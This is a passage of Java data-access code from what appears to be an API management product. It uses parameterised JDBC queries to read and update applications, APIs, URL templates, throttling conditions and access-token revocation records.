= prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } public Application getApplicationById(int applicationId, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = 
SQLConstants.GET_APPLICATION_BY_ID_SQL; String whereClause = " AND SUB.USER_ID =?"; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) =LOWER(?)"; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInSensitive = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? )"; String whereClauseWithMultiGroupIdCaseInSensitive = " AND ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR LOWER(SUB.USER_ID) = LOWER(?) )"; if (groupId != null && !"null".equals(groupId) && !groupId.isEmpty()) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithMultiGroupIdCaseInSensitive; } else { query = query + whereClauseWithMultiGroupId; } String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length + 1; //since index 1 is applicationId // query params will fil from 2 prepStmt = fillQueryParams(connection, query, groupIds, 2); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setInt(1, applicationId); prepStmt.setString(++parameterIndex, userId); } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseWithGroupIdCaseInSensitive; } else { query = query + whereClauseWithGroupId; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, groupId); prepStmt.setString(3, userId); } } else { if (forceCaseInsensitiveComparisons) { query = query + whereClauseCaseInSensitive; } else { query = query + whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, applicationId); prepStmt.setString(2, userId); } rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setOwner(rs.getString("CREATED_BY")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(applicationId)); } } } if (application != null) { Map<String,String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } 
catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieves the Application which is corresponding to the given UUID String * * @param uuid UUID of Application * @return * @throws APIManagementException */ public Application getApplicationByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_UUID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, uuid); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberId = rs.getString("SUBSCRIBER_ID"); String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(Integer.parseInt(subscriberId)); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? 
null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created application.setLastUpdatedTime(application.getCreatedTime()); } } // Get custom attributes of application if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateURLTemplates(API api) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId; String deleteOldMappingsQuery = SQLConstants.REMOVE_FROM_URI_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteOldMappingsQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); addURLTemplates(apiId, api, connection); connection.commit(); } catch (SQLException e) { handleException("Error while deleting URL template(s) for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * returns all URL templates define for all active(PUBLISHED) APIs. */ public ArrayList<URITemplate> getAllURITemplates(String apiContext, String version) throws APIManagementException { if (APIUtil.isAdvanceThrottlingEnabled()) { return getAllURITemplatesAdvancedThrottle(apiContext, version); } else { return getAllURITemplatesOldThrottle(apiContext, version); } } public ArrayList<URITemplate> getAllURITemplatesOldThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); //TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.GET_ALL_URL_TEMPLATES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); rs = prepStmt.executeQuery(); URITemplate uriTemplate; while (rs.next()) { uriTemplate = new URITemplate(); String script = null; uriTemplate.setHTTPVerb(rs.getString("HTTP_METHOD")); uriTemplate.setAuthType(rs.getString("AUTH_SCHEME")); uriTemplate.setUriTemplate(rs.getString("URL_PATTERN")); uriTemplate.setThrottlingTier(rs.getString("THROTTLING_TIER")); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); uriTemplate.getThrottlingConditions().add("_default"); uriTemplates.add(uriTemplate); } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } public ArrayList<URITemplate> getAllURITemplatesAdvancedThrottle(String apiContext, String version) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int tenantId; 
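/* Illustrative sketch of the grouping performed below (the sample pattern is an assumption, not taken from the data): each row returned by GET_CONDITION_GROUPS_FOR_POLICIES_SQL is keyed as "HTTP_METHOD:URL_PATTERN", e.g. "GET:/orders/{id}". The first row seen for a key creates the URITemplate; every non-empty CONDITION_GROUP_ID for that key is turned into a ConditionGroupDTO whose id is "_condition_" + CONDITION_GROUP_ID. */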
ArrayList<URITemplate> uriTemplates = new ArrayList<URITemplate>(); String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(apiContext); if (apiTenantDomain != null) { tenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); } else { tenantId = MultitenantConstants.SUPER_TENANT_ID; } // TODO : FILTER RESULTS ONLY FOR ACTIVE APIs String query = SQLConstants.ThrottleSQLConstants.GET_CONDITION_GROUPS_FOR_POLICIES_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiContext); prepStmt.setString(2, version); prepStmt.setInt(3, tenantId); rs = prepStmt.executeQuery(); Map<String, Set<ConditionGroupDTO>> mapByHttpVerbURLPatternToId = new HashMap<String, Set<ConditionGroupDTO>>(); while (rs != null && rs.next()) { String httpVerb = rs.getString("HTTP_METHOD"); String authType = rs.getString("AUTH_SCHEME"); String urlPattern = rs.getString("URL_PATTERN"); String policyName = rs.getString("THROTTLING_TIER"); String conditionGroupId = rs.getString("CONDITION_GROUP_ID"); String applicableLevel = rs.getString("APPLICABLE_LEVEL"); String policyConditionGroupId = "_condition_" + conditionGroupId; String key = httpVerb + ":" + urlPattern; if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (StringUtils.isEmpty(conditionGroupId)) { continue; } // Converting ConditionGroup to a lightweight ConditionGroupDTO. ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); // mapByHttpVerbURLPatternToId.get(key).add(policyConditionGroupId); mapByHttpVerbURLPatternToId.get(key).add(groupDTO); } else { String script = null; URITemplate uriTemplate = new URITemplate(); uriTemplate.setThrottlingTier(policyName); uriTemplate.setAuthType(authType); uriTemplate.setHTTPVerb(httpVerb); uriTemplate.setUriTemplate(urlPattern); uriTemplate.setApplicableLevel(applicableLevel); InputStream mediationScriptBlob = rs.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); } uriTemplate.setMediationScript(script); Set<ConditionGroupDTO> conditionGroupIdSet = new HashSet<ConditionGroupDTO>(); mapByHttpVerbURLPatternToId.put(key, conditionGroupIdSet); uriTemplates.add(uriTemplate); if (StringUtils.isEmpty(conditionGroupId)) { continue; } ConditionGroupDTO groupDTO = createConditionGroupDTO(Integer.parseInt(conditionGroupId)); groupDTO.setConditionGroupId(policyConditionGroupId); conditionGroupIdSet.add(groupDTO); } } for (URITemplate uriTemplate : uriTemplates) { String key = uriTemplate.getHTTPVerb() + ":" + uriTemplate.getUriTemplate(); if (mapByHttpVerbURLPatternToId.containsKey(key)) { if (!mapByHttpVerbURLPatternToId.get(key).isEmpty()) { Set<ConditionGroupDTO> conditionGroupDTOs = mapByHttpVerbURLPatternToId.get(key); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); conditionGroupDTOs.add(defaultGroup); // uriTemplate.getThrottlingConditions().addAll(mapByHttpVerbURLPatternToId.get(key)); uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(conditionGroupDTOs.toArray(new ConditionGroupDTO[]{})); } } if (uriTemplate.getThrottlingConditions().isEmpty()) { uriTemplate.getThrottlingConditions().add(APIConstants.THROTTLE_POLICY_DEFAULT); ConditionGroupDTO defaultGroup = new ConditionGroupDTO(); 
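/* A template that matched no stored condition groups still receives the implicit default group below, so the gateway always has at least one applicable throttling policy. */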
defaultGroup.setConditionGroupId(APIConstants.THROTTLE_POLICY_DEFAULT); uriTemplate.setConditionGroups(new ConditionGroupDTO[]{defaultGroup}); } } } catch (SQLException e) { handleException("Error while fetching all URL Templates", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return uriTemplates; } /** * This method is used to get the API provider by giving API name, API version and tenant domain * * @param apiName API name * @param apiVersion API version * @param tenant tenant domain * @return API provider * @throws APIManagementException if failed to get the API provider by giving API name, API version, tenant domain */ public String getAPIProviderByNameAndVersion(String apiName, String apiVersion, String tenant) throws APIManagementException { if (StringUtils.isBlank(apiName) || StringUtils.isBlank(apiVersion) || StringUtils.isBlank(tenant)) { String msg = "API name, version, tenant cannot be null when fetching provider"; log.error(msg); throw new APIManagementException(msg); } PreparedStatement prepStmt = null; ResultSet rs = null; String apiProvider = null; String getAPIProviderQuery = null; try(Connection connection = APIMgtDBUtil.getConnection()) { if (MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equalsIgnoreCase(tenant)) { //in this case, the API should be fetched from super tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_SUPER_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); } else { //in this case, the API should be fetched from the respective tenant getAPIProviderQuery = SQLConstants.GET_API_PROVIDER_WITH_NAME_VERSION_FOR_GIVEN_TENANT; prepStmt = connection.prepareStatement(getAPIProviderQuery); prepStmt.setString(3, "%" + tenant + "%"); } prepStmt.setString(1, apiName); prepStmt.setString(2, apiVersion); rs = prepStmt.executeQuery(); if (rs.next()) { apiProvider = rs.getString("API_PROVIDER"); } if (StringUtils.isBlank(apiProvider)) { String msg = "Unable to find provider for API: " + apiName + " in the database"; log.warn(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiName + " from the database", e); } return apiProvider; } /** * Converts an {@code Pipeline} object into a {@code ConditionGroupDTO}.{@code ConditionGroupDTO} class tries to * contain the same information held by {@code Pipeline}, but in a much lightweight fashion. * * @param conditionGroup Id of the condition group ({@code Pipeline}) to be converted * @return An object of {@code ConditionGroupDTO} type. 
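* Each supported condition type (IP range, specific IP, header, JWT claim, query parameter) is flattened into a single name/value ConditionDTO pair.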
* @throws APIManagementException */ private ConditionGroupDTO createConditionGroupDTO(int conditionGroup) throws APIManagementException { List<Condition> conditions = getConditions(conditionGroup); ArrayList<ConditionDTO> conditionDTOs = new ArrayList<ConditionDTO>(conditions.size()); for (Condition condition : conditions) { ConditionDTO conditionDTO = new ConditionDTO(); conditionDTO.setConditionType(condition.getType()); conditionDTO.isInverted(condition.isInvertCondition()); if (PolicyConstants.IP_RANGE_TYPE.equals(condition.getType())) { IPCondition ipRangeCondition = (IPCondition) condition; conditionDTO.setConditionName(ipRangeCondition.getStartingIP()); conditionDTO.setConditionValue(ipRangeCondition.getEndingIP()); } else if (PolicyConstants.IP_SPECIFIC_TYPE.equals(condition.getType())) { IPCondition ipCondition = (IPCondition) condition; conditionDTO.setConditionName(PolicyConstants.IP_SPECIFIC_TYPE); conditionDTO.setConditionValue(ipCondition.getSpecificIP()); } else if (PolicyConstants.HEADER_TYPE.equals(condition.getType())) { HeaderCondition headerCondition = (HeaderCondition) condition; conditionDTO.setConditionName(headerCondition.getHeaderName()); conditionDTO.setConditionValue(headerCondition.getValue()); } else if (PolicyConstants.JWT_CLAIMS_TYPE.equals(condition.getType())) { JWTClaimsCondition jwtClaimsCondition = (JWTClaimsCondition) condition; conditionDTO.setConditionName(jwtClaimsCondition.getClaimUrl()); conditionDTO.setConditionValue(jwtClaimsCondition.getAttribute()); } else if (PolicyConstants.QUERY_PARAMETER_TYPE.equals(condition.getType())) { QueryParameterCondition parameterCondition = (QueryParameterCondition) condition; conditionDTO.setConditionName(parameterCondition.getParameter()); conditionDTO.setConditionValue(parameterCondition.getValue()); } conditionDTOs.add(conditionDTO); } ConditionGroupDTO conditionGroupDTO = new ConditionGroupDTO(); conditionGroupDTO.setConditions(conditionDTOs.toArray(new ConditionDTO[]{})); return conditionGroupDTO; } public void updateAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String previousDefaultVersion = getDefaultVersion(api.getId()); String query = SQLConstants.UPDATE_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //Header change check not required here as we update API level throttling tier //from same call. //TODO review and run tier update as separate query if need. prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getContext()); String contextTemplate = api.getContextTemplate(); //If the context template ends with {version} this means that the version will be at the end of the // context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(2, contextTemplate); //TODO Need to find who exactly does this update. 
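/* Bind order of the remaining UPDATE_API_SQL parameters set below: 3 = updated-by user (left null here, see the TODO above), 4 = update timestamp, 5 = API level throttling policy, 6-8 = provider, API name and version identifying the row being updated. */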
prepStmt.setString(3, null); prepStmt.setTimestamp(4, new Timestamp(System.currentTimeMillis())); prepStmt.setString(5, api.getApiLevelPolicy()); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(7, api.getId().getApiName()); prepStmt.setString(8, api.getId().getVersion()); prepStmt.execute(); //} if (api.isDefaultVersion() ^ api.getId().getVersion().equals(previousDefaultVersion)) { //A change has // happen //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } else { //tick is removed removeAPIFromDefaultVersion(api.getId(), connection); } } connection.commit(); //check whether there are any associated api products before updating url temaplates and scopes //TODO move to constants String queryGetAssociatedAPIProducts = "SELECT AM_API_PRODUCT.UUID " + "FROM AM_API_PRODUCT_MAPPING, AM_API_URL_MAPPING, AM_API_PRODUCT " + "WHERE " + "AM_API_PRODUCT_MAPPING.URL_MAPPING_ID = AM_API_URL_MAPPING.URL_MAPPING_ID " + "AND AM_API_PRODUCT.API_PRODUCT_ID = AM_API_PRODUCT_MAPPING.API_PRODUCT_ID " + "AND API_ID = ?"; int apiId = getAPIID(api.getId(), connection); PreparedStatement prepStmtGetAssociatedAPIProducts = connection .prepareStatement(queryGetAssociatedAPIProducts); prepStmtGetAssociatedAPIProducts.setInt(1, apiId); ResultSet rs = null; rs = prepStmtGetAssociatedAPIProducts.executeQuery(); List<APIProduct> apiProducts = new ArrayList<APIProduct>(); while (rs.next()) { String productUUID = rs.getString("UUID"); apiProducts.add(getAPIProduct(productUUID)); } synchronized (scopeMutex) { //remove api product mappings before updating api url templates deleteProductMappingsForAPI(api, apiProducts); updateScopes(api, tenantId); updateURLTemplates(api); /* update scopes above will delete all scopes and scope mappings associated with API (including product scopes). after update url templates template ids will change. So we have to add product scopes and mappings again after updating api templates */ addProductMappingsForAPI(api, apiProducts); addProductScopes(apiProducts, tenantId); } } catch (SQLException e) { handleException("Error while updating the API: " + api.getId() + " in the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public int getAPIID(APIIdentifier apiId, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_ID"); } if (id == -1) { String msg = "Unable to find the API: " + apiId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + apiId + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Get product Id from the product name and the provider. 
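* When the supplied connection is null, a new connection is opened for the lookup and closed before returning.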
* @param productName product name * @param provider provider * @param connection db connection * @return product id * @throws APIManagementException exception */ public int getAPIProductID(String productName, String provider, Connection connection) throws APIManagementException { boolean created = false; PreparedStatement prepStmt = null; ResultSet rs = null; int id = -1; String getAPIQuery = SQLConstants.GET_API_PRODUCT_ID_SQL; try { if (connection == null) { // If connection is not provided a new one will be created. connection = APIMgtDBUtil.getConnection(); created = true; } prepStmt = connection.prepareStatement(getAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, productName); rs = prepStmt.executeQuery(); if (rs.next()) { id = rs.getInt("API_PRODUCT_ID"); } if (id == -1) { String msg = "Unable to find the API Product : " + productName + "-" + provider + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while locating API: " + productName + "-" + provider + " from the database", e); } finally { if (created) { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } else { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } } return id; } /** * Delete a record from AM_APPLICATION_KEY_MAPPING table * * @param consumerKey * @throws APIManagementException */ public void deleteApplicationMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String deleteApplicationKeyQuery = SQLConstants.REMOVE_APPLICATION_MAPPINGS_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteApplicationKeyQuery); prepStmt.setString(1, consumerKey); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting mapping: consumer key " + consumerKey + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void deleteAPI(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int id; String deleteLCEventQuery = SQLConstants.REMOVE_FROM_API_LIFECYCLE_SQL; String deleteCommentQuery = SQLConstants.REMOVE_FROM_API_COMMENT_SQL; String deleteRatingsQuery = SQLConstants.REMOVE_FROM_API_RATING_SQL; String deleteSubscriptionQuery = SQLConstants.REMOVE_FROM_API_SUBSCRIPTION_SQL; String deleteExternalAPIStoresQuery = SQLConstants.REMOVE_FROM_EXTERNAL_STORES_SQL; String deleteAPIQuery = SQLConstants.REMOVE_FROM_API_SQL; String deleteURLTemplateQuery = SQLConstants.REMOVE_FROM_API_URL_MAPPINGS_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); id = getAPIID(apiId, connection); synchronized (scopeMutex) { removeAPIScope(apiId); } prepStmt = connection.prepareStatement(deleteSubscriptionQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all comments associated with given API prepStmt = connection.prepareStatement(deleteCommentQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteRatingsQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, 
this statement will close in finally else here prepStmt = connection.prepareStatement(deleteLCEventQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here //Delete all external APIStore details associated with a given API prepStmt = connection.prepareStatement(deleteExternalAPIStoresQuery); prepStmt.setInt(1, id); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteAPIQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); prepStmt.execute(); prepStmt.close();//If exception occurs at execute, this statement will close in finally else here prepStmt = connection.prepareStatement(deleteURLTemplateQuery); prepStmt.setInt(1, id); prepStmt.execute(); String curDefaultVersion = getDefaultVersion(apiId); String pubDefaultVersion = getPublishedDefaultVersion(apiId); if (apiId.getVersion().equals(curDefaultVersion)) { removeAPIFromDefaultVersion(apiId, connection); } else if (apiId.getVersion().equals(pubDefaultVersion)) { setPublishedDefVersion(apiId, connection, null); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the API: " + apiId + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Change access token status in to revoked in database level. * * @param key API Key to be revoked * @throws APIManagementException on error in revoking access token */ public void revokeAccessToken(String key) throws APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(key, accessTokenStoreTable); Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.REMOVE_ACCESS_TOKEN_PREFIX + accessTokenStoreTable + SQLConstants .REVOKE_ACCESS_TOKEN_SUFFIX; ps = conn.prepareStatement(query); ps.setString(1, APIUtil.encryptToken(key)); ps.execute(); conn.commit(); } catch (SQLException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } catch (CryptoException e) { handleException("Error in revoking access token: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * Get all applications associated with given tier * * @param tier String tier name * @return Application object array associated with tier * @throws APIManagementException on error in getting applications array */ public Application[] getApplicationsByTier(String tier) throws APIManagementException { if (tier == null) { return null; } Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATION_BY_TIER_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, tier); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), getSubscriber(rs.getString("SUBSCRIBER_ID"))); application.setId(rs.getInt("APPLICATION_ID")); applicationsList.add(application); } 
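/* The list assembled above is sorted case-insensitively by application name before being copied into the returned array, giving callers a stable alphabetical ordering. */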
Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } private void handleException(String msg, Throwable t) throws APIManagementException { log.error(msg, t); throw new APIManagementException(msg, t); } public HashMap<String, String> getURITemplatesPerAPIAsString(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; int apiId; HashMap<String, String> urlMappings = new LinkedHashMap<String, String>(); try { conn = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_URL_TEMPLATES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { String script = null; String uriPattern = resultSet.getString("URL_PATTERN"); String httpMethod = resultSet.getString("HTTP_METHOD"); String authScheme = resultSet.getString("AUTH_SCHEME"); String throttlingTier = resultSet.getString("THROTTLING_TIER"); InputStream mediationScriptBlob = resultSet.getBinaryStream("MEDIATION_SCRIPT"); if (mediationScriptBlob != null) { script = APIMgtDBUtil.getStringFromInputStream(mediationScriptBlob); // set null if the script is empty. Otherwise ArrayIndexOutOfBoundsException occurs when trying // to split by :: if (script.isEmpty()) { script = null; } } urlMappings.put(uriPattern + "::" + httpMethod + "::" + authScheme + "::" + throttlingTier + "::" + script, null); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return urlMappings; } // This should be only used only when Token Partitioning is enabled. public String getConsumerKeyForTokenWhenTokenPartitioningEnabled(String accessToken) throws APIManagementException { if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String 